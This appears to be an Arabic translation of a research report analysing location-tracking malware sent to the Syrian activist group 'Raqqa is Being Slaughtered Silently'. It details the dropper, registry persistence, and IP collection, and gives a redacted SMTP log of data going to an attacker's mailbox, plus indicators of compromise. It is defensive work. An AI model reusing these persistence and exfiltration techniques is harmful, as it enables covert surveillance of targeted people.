ملخص:
يتناول هذا التقرير هجوماً خبيثاً يرتبط بدولة الإسلام في العراق والشام. وحرصاً على التركيز على تطور هذا التهديد، نقوم في هذا التقرير بتحليل الهجوم وتزويدكم بقائمة حول مؤشرات الإصابة به.
تعرّضت مجموعة إعلامية سورية تنتقد دولة الإسلام في العراق والشام لهجوم رقمي يستهدف كشف مواقع أفرادها. مجموعة “الرقة تذبح بصمت” تركز نشاطها على توثيق انتهاكات حقوق الانسان من قبل عناصر “داعش” الذي يحتلّون مدينة الرقة. وكردّ منهم قام العناصر عدة مرات باستهداف المجموعة عبر مداهمات للمنازل، وتنفيذ عمليات خطف واغتيالات.
تواجه المجموعة أيضاً تهديدات على الإنترنت من قبل عناصر “داعش” ومناصريها، تتضمن تهكّمات من أن “داعش” تتجسس على المجموعة.
على الرغم من أننا لا نستطيع أن ننسب بشكل قاطع الهجوم لـ”داعش” أو مناصريها، إلا أنه من المعقول أنها على علاقة بالموضوع.
كون البرمجية الخبيثة المستخدمة في الهجوم تختلف عن تلك الحملات التي يشنها النظام السوري، ويستهدف الهجوم مجموعة ناشطة ضد قوات “داعش”.
تحليل الهجوم
يصف هذا القسم هجوماً تم شنّه بتركيز على عناوين بريد إلكترونية تعود إلى القائمين على حملة “الرقة تذبح بصمت”، “سيتزن لاب” قام بتحليل هذا الهجوم بموافقة القائمين على المجموعة، الذين طلبوا بدورهم أن يتم ذكر أسماءهم في هذا التقرير.
الهجوم أخد شكل البريد غير المرغوب فيه، ويحتوي على رابط تحميل للملف الخبيث، الذي يخفي برمجية خبيثة مخصصة تقوم بإرسال معلومات عن جهاز الضحية وعنوان الـ”آيبي” الخاص به إلى عنوان بريد إلكتروني يقوم بإدارته الشخص الذي قام بتنفيذ الهجوم.
البرمجيات الخبيثة المستخدمة في هذا الهجوم تصيب المستخدم الذي يقوم بفتح الملف الخبيث “slideshow”، وتقوم بإرسال معلومات حول نظام التشغيل على جهازه وعنوان الـ”آيبي” إضافة إلى كشف موقعه الجغرافي، وتقوم بتحديث هذه المعلومات في كل مرة يتم فيها إعادة تشغيل الجهاز المصاب.
على عكس البرمجيات الخبيثة المرتبطة بالنظام السوري، لا تحتوي البرمجية الخبيثة التالية على أي وظائف خاصة بالتحكم عن بعد، مما يرجح أنها تستهدف تحديد مواقع الأشخاص المستهدفين.
طريقة الإصابة
زيارة الرابط المرسل في البريد الإلكتروني يقوم بتحويل المستخدم إلى موقع مشاركة الملفات “tempsend.com” لتحميل ملف يحمل اسم slideshow.zip
والذي يحتوي بدوره على الملف slideshow.exe
الملف يقوم بفك الضغط عن نفسه تلقائياً ويحمل أيقونة تهدف إلى الإيحاء للضحية بأن هذا الملف هو ملف “عرض شرائح”.
عند فتح الملف، يتم عرض شرائح تحتوي على صور تم أخدها من “غوغل إيرث”، تعرض مواقع في سوريا وتشير إلى مقر “داعش” الرئيسي، وصور أخرى للمواقع التي قصفت خلال الضربات الجوية الأمريكية.
الإصابة وجمع البيانات
عند الفتح، يقوم ملف “slideshow.zip” بإنشاء وفتح عدد من الملفات:
C:\Users\[Username]\AppData\Local\Temp\IXP000.TMP\AdobeR1.exe
C:\Users\[Username]\AppData\Local\Temp\IXP000.TMP\pictures.exe
“AdobeR1.exe” هو الملف الخبيث، بينما “pictures.exe” هو الملف السليم الذي يقوم بعرض الشرائح. عند إغلاق عرض الشرائح يتم حذف الملفين.
ملف “AdobeR1” يقوم بكتابة مجموعة من الملفات التنفيذية تقوم بجمع المعلومات ووظائف الاتصال، وتتضمن هذه الملفات:
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\AdbrRader.exe
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\AdobeIns.exe
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\GoogleUpate.exe
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\GooglUpd.exe
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvidrv.exe
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvisdvr.exe
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\rundl132.exe
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\svhosts.exe
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvidrv.exe
التسلسل البرمجي
التسلسل البرمجي في جمع وإرسال المعلومات غير مألوف إلى حد ما، حيث يقوم كل برنامج بوظيفة واحدة ويتم الاتصال عبر العلامات التي يتم خلقها في سجل نظام التشغيل. وتظهر البرامج أنها تستخدم مكتبة تشغيل “Visual C++”.
أولاً، البرنامج nvidrv يقوم بإضافة نفسه إلى قائمة التشغيل التلقائي:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run under name “UpdAdbreader”
كما يقوم بإنشاء سلسلة من مفاتيح التسجيل التي يقوم كل برنامج باستخدامها للاتصال.
مفاتيح التسجيل والبرامج التي تستخدمها:
rundl132.exe:
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K6F-DKV8J-FKVJI-GVKBU\6nvisdvr.exe:
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K4F-DKV8J-FKVJI-GVKBU\4GoogleUpate.exe:
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K3F-DKV8J-FKVJI-GVKBU\3AdbrRader.exe:
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K2F-DKV8J-FKVJI-GVKBU\2nvidrv.exe:
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K1F-DKV8J-FKVJI-GVKBU\1
Sets name “1” to StartupInfo structure as a string, e.g. “0x3110x611”
يقوم بعدها nvidrv بتشغيل برنامج “GooglUpd”، الذي يقوم بدوره بتنظيف ملفات البرنامج إن وجدت ثم يقوم بتشغيل برنامج “AdbrRader”.
AdbrRader (الذي يقوم بالاتصال عبر مفتاح التسجيل “٢”) يقوم بكتابة الملف “vgadmysadm.tmp” مع اسم المفتاح الآخر “٢” ومعلومات بدء التشغيل.
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\ vgadmysadm.tmp
تالياً، يقوم nvidrv بتشغيل GoogleUpdate الذي يقوم بجمع معلومات عن نظام التشغيل ويقوم بكتابة هذه المعلومات في الملف:
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vg2sxoysinf.tmp
ثم يقوم nvidrv بتشغيل nvisdvr (المفتاح رقم “٤”) الذي يقوم بجمع قائمة العمليات المفتوحة في الجهاز، وتتم كتابة هذه الملعلومات في الملف:
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\v2cgplst.tmp
أخيراً، يقوم nvidrv بتشغيل svhosts، الذي يقوم باختبار الاتصال بشبكة الانترنت عبر عملية استعلام نظام اسم النطاقات (DNS query) للعنوان “windowsupdate.microsoft.com” ثم يقوم بتشغيل الملف “rundl132” في حال لم يتم تشغيله مسبقا، وذلك عبر التحقق من وجود المفتاح “٦” في السجل، حيث يقوم بإضافة القيمة 0 إلى المفتاح ثم يقوم بتشغيله.
في الخطوة التالية يقوم الملف “rundl132.exe” بتنفيذ طلب HTTP GET للعنوان “myexternalip.com” ثم يقوم بالتقاط العنوان الخاص بالجهاز المصاب:
GET /raw HTTP/1.1
Host: myexternalip.com
Cache-Control: no-cacheHTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Date: [REDACTED]
My-External-Ip: [REDACTED]f
[REDACTED]0
ثم يعمد rundl132 إلى إنشاء الملف:
C:\Users\[Username]\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q7B90TFG\raw[1].txt
ثم يقوم بكتابة عنوان الـ”آيبي” في الملف:
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vgosysaext.tmp
أخيراً، يقوم rundl132 بتشغيل AdobeIns، الذي يقوم بضغط محتويات مجلد win32.tmp.
“AdobeIns.exe” يقوم بجمع الملفات التي تمت كتابتها من قبل البرامج الأخرى ويقوم بوضعها في ملف zip مضغوط ومحمي بكلمة سر:
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\drv.sys\mxtd
نقل البيانات
يتم نقل البيانات إلى عنوان بريد إلكتروني يتم التحكم به من قبل المهاجم.
يقوم “AdobeIns” بالاتصال بحساب موجود على مزود البريد الإلكتروني inbox.com عبر اتصال SMTP باستخدام بيانات دخول تم تضمينها في البرنامج. البرمجية الخبيثة تقوم بإرسال البريد الإلكتروني إلى العنوان ذاته يحتوي على النص “Hello” ومرفقاً بالملف “mxtd”.
البيانات التي تم توليدها عبر اتصال “SMTP” من قبل البرمجية الخبيثة وإرسالها إلى موقع inbox.com:
220 [REDACTED]ESMTP Postfix
EHLO [REDACTED]
250-[REDACTED]
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:< [REDACTED]@inbox.com>
250 2.1.0 Ok
RCPT TO:< [REDACTED]@inbox.com>
250 2.1.5 Ok
DATA
354 End data with .
Date: [REDACTED]
From: <[REDACTED]@inbox.com>
X-Priority: 3 (Normal)
To: <[REDACTED]@inbox.com>
Subject: repo
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=”__MESSAGE__ID__[REDACTED]”–__MESSAGE__ID__[REDACTED]
Content-type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bitHello
–__MESSAGE__ID__[REDACTED]
Content-Type: application/x-msdownload; name=”mxtd”
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=”mxtd”[REDACTED]–__MESSAGE__ID__[REDACTED]–.
250 2.0.0 Ok: queued as [REDACTED]
QUIT
221 2.0.0 Bye
تقييم وظائف البرمجية الخبيثة
البرمجيات الخبيثة في هذه الدراسة غير عادية لأنها تعتمد على ستة ملفات تنفيذية منفصلة، لكل منها مهمة واحدة، وكل واحدة تتواصل عبر علامات أنشئت في السجل.
البرمجيات الخبيثة أيضا مثيرة للاهتمام لأنها لا توفر إمكانية التحكم عن بعد، ولكن فقط ترسل رسالة بالبريد الالكتروني تحتوي على عنوان الـ”آيبي” الخاص بالضحية ومعلومات عن نظام التشغيل.
وتقوم البرمجية الخبيثة بإعادة إرسال المعلومات من جديد في كل مرة يتم إعادة تشغيل الحاسوب فيها، ولكنه لا يقوم بتحديث المعلومات التي يتم إرسالها عند إعادة التشغيل (قد يكون خطأ برمجي).
هذا السلوك يشير بقوة إلى أن وظيفة هذه البرمجيات الخبيثة هي تحديد ومتابعة موقع الضحية. وقد يتم استخدام معلومات النظام لاستهداف جهاز الضحية مستقبلاً، ولكن طالما أن المهاجم قد قام بالفعل بعملية تشغيل ملفات على جهاز الضحية فإنه من المفاجئ عدم استخدام أي وظائف إضافية، أو عدم استخدام أي أداة للتحكم عن بعد، حيث كان من الممكن لهذه الأداة تزويدهم بوصول أوسع ومعلومات أكثر عن الضحية تتعدى عنوان الـ”آيبي”.
عبر عدم احتوائه على أي وظائف تتعلق بالتحكم عن بعد، يبدو البرنامج أقل شبهاً بالبرمجيات الخبيثة، وقد يثير شبهات أقل في أدوات الحماية والتفحص. حيث حقق البرنامج كشفاً بعدد مرات أقل عند إرساله للمرة الأولى لموقع virustotal، على سبيل المثال تم كشفه من قبل 6 من أصل 55 مضاد فيروسات، ما يعني نسبة 10٪ فقط.
نقل بيانات البرمجية الخبيثة عبر البريد الإلكتروني يضيف درجة إضافية من الغموض، ويوفر طبقة إضافية من التجريد بين المهاجم والضحية: حيث لا يوجد أي حاجة لوجود مخدّم سيطرة وتحكم. حيث تنتقل بيانات البرمجية الخبيثة بشكل مستقل، تاركةً المواد في البريد الإلكتروني ليقوم المهاجم بتجميعها في وقت لاحق.
البرمجية الخبيثة لا تحتوي على أية عمليات تمويه وليس متقناً بشكل كبير في تطويرها أو التفاعل مع نظام التشغيل. ولكن مع ذلك، فإننا نعتقد أن مطور هذا البرنامج هو على علم بتقنيات معينة للحد من كشف البرامج الضارة على الشبكة، بما في ذلك نقل البيانات عبر اتصالات مشفرة للبريد الإلكتروني. ومع ذلك، فإن المهاجم لم ينفذ تشفير البريد الإلكتروني بشكل صحيح:
البرمجية الخبيثة لن تحاول استخدام اتصال TLS في حالات معينة، ونتيجة لذلك فإن بيانات الدخول إلى البريد الإلكتروني ستكون مقروءة في بيانات الشبكة.
إضافة إلى ذلك، تستخدم البرمجية الخبيث تقنية “PKWARE” القديمة في تشفير ملفات ZIP، والتي لا يمكن اعتبارها آمنة حيث يتم تخزين كلمة السر في الرمز الثنائي (Binary) الخاص بالملف المضغوط دون أي تشفير أو تمويه.
مؤشرات على الإصابة
الملفات الخبيثة
| اسم الملف | MD5 |
| slideshow.zip | b72e6678e79cc57d33e684528b5721bd |
| slideshow.exe | f8bfb82aa92ea6a8e4e0b378781b3859 |
ملفات تم إنشاؤها بواسطة الملفات الخبيثة
| اسم ومسار الملف | MD5 |
| C:\Users\[Username]\AppData\Local\Temp\IXP000.TMP\AdobeR1.exe (note: folder and file deleted after slideshow closed) |
aa6bcba23cd39c2827d72d33f5104856 |
| C:\Users\[Username]\AppData\Local\Temp\IXP000.TMP\pictures.exe (note: folder and file deleted after slideshow closed) |
eda83c8e4ba7d088593f22d56cf39d9f |
| C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\AdbrRader.exe | 9d36e8e3e557239d7006d0bb5c2df298 |
| C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\AdobeIns.exe | 1d5d8c5ce3854de61b28de7ca73093f1 |
| C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\GoogleUpate.exe | 55039dd6ce3274dbce569473ad37918b |
| C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\GooglUpd.exe | efdd9b96ae0f43f7d738ead2e1d5430c |
| C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvidrv.exe | 0e3eb8de93297f12b56de9fc33657066 |
| C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvisdvr.exe | 3eb6f95c321ace0e3b101fd7e2cdd489 |
| C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\rundl132.exe | 84bbd592a212f5a84923e82621e9177d |
| C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\ svhosts.exe | 13caa1c95e6610f2d5134174e1fb4fd0 |
ملفات المعلومات التي يتم جمعها (غير مشفرة)
| اسم ومسار الملف |
| C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\v2cgplst.tmp |
| C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vg2sxoysinf.tmp |
| C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vgadmysadm.tmp |
| C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vgosysaext.tmp |
الملف المسرّب (مشفر)
| اسم ومسار الملف |
| C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\drv.sys\mxtd |
مفاتيح التسجيل
| اسم ومسار الملف |
| DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K1F-DKV8J-FKVJI-GVKBU\1 |
| DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K2F-DKV8J-FKVJI-GVKBU\2 |
| DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K3F-DKV8J-FKVJI-GVKBU\3 |
| DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K4F-DKV8J-FKVJI-GVKBU\4 |
| DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K6F-DKV8J-FKVJI-GVKBU\6 |
شكر وتقدير
نحن ممتنون لفريق “سايبر أرابز” و”معهد صحافة الحرب والسلام” (IWPR) لعملهم ومساعدتهم.
كما نشكر بشكل خاص الذين قاموا بالمساعدة في إعداد هذا التقرير: سوريون مجهولون، ماساشي كريت-نيشيهاتا، سارة مكون، مورغان ماركيزبوير، رون ديبرت، بيل مارزاك، نارت فيلينوف، إيرين بويترانتو، كريستين دينيسين.
الدعم مقدم لهذا البحث عبر منح من قبل منظمة جون دي وكاثرين مكارثر، ومنظمة فورد.
